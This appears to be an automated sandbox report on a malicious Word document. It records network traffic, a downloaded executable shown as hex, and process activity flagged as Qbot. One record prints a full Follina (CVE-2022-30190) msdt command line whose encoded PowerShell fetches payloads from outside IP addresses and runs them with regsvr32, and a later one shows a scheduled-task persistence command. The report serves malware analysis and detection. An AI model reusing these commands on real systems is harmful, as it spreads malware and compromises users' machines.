                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      If-None-Match: "6299dd5d-1861"
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 19:50:15.836622953 CEST1303INHTTP/1.1 304 Not Modified
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Jun 7, 2022 19:50:15.843090057 CEST1303OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 19:50:15.871623039 CEST1304INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 19:50:16.061703920 CEST1304OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 19:50:16.090388060 CEST1305INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:16 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 19:50:18.555954933 CEST1305OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 19:50:18.584733009 CEST1305INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:50:18 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.549865185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jun 7, 2022 19:51:26.283952951 CEST12199OUTGET /972639944.dat HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 19:51:26.452574015 CEST12201INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 17:51:26 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 1437696
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Expires: 0
                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                      Content-Disposition: attachment;
                                                                                                                                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54
                                                                                                                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B* @Pp%HlSCODE `DATA' (@BSSqP..idata%p&.@.reloclSTT@P.rsrcHH@PP@P@Boolean@FalseT


                                                                                                                                                                      Statistics

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:19:50:04
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                      Imagebase:0x10a0000
                                                                                                                                                                      File size:1937688 bytes
                                                                                                                                                                      MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:19:50:11
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                      Imagebase:0x3b0000
                                                                                                                                                                      File size:466688 bytes
                                                                                                                                                                      MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:19:50:11
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                      Imagebase:0x3b0000
                                                                                                                                                                      File size:466688 bytes
                                                                                                                                                                      MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:19:50:17
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                      Imagebase:0x870000
                                                                                                                                                                      File size:1508352 bytes
                                                                                                                                                                      MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.710859302.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.711008375.0000000003308000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.710962250.0000000003300000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.712552314.0000000003600000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:19:50:52
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                                                                                                                                                                      Imagebase:0x270000
                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:19:50:54
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
                                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:19:51:00
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                                                                                                                                                                      Imagebase:0x270000
                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:23
                                                                                                                                                                      Start time:19:51:02
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
                                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:27
                                                                                                                                                                      Start time:19:51:27
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                                                                                                                                                                      Imagebase:0x9d0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:28
                                                                                                                                                                      Start time:19:51:28
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                                                                                                                                                                      Imagebase:0x9d0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:29
                                                                                                                                                                      Start time:19:51:29
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                                                                                                                                                                      Imagebase:0x9d0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:30
                                                                                                                                                                      Start time:19:51:42
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline
                                                                                                                                                                      Imagebase:0x270000
                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:31
                                                                                                                                                                      Start time:19:51:56
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
                                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:32
                                                                                                                                                                      Start time:19:51:59
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0x850000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:33
                                                                                                                                                                      Start time:19:51:59
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0x850000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:34
                                                                                                                                                                      Start time:19:52:01
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0x850000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:35
                                                                                                                                                                      Start time:19:52:04
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
                                                                                                                                                                      Imagebase:0xec0000
                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:36
                                                                                                                                                                      Start time:19:52:05
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff77f440000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

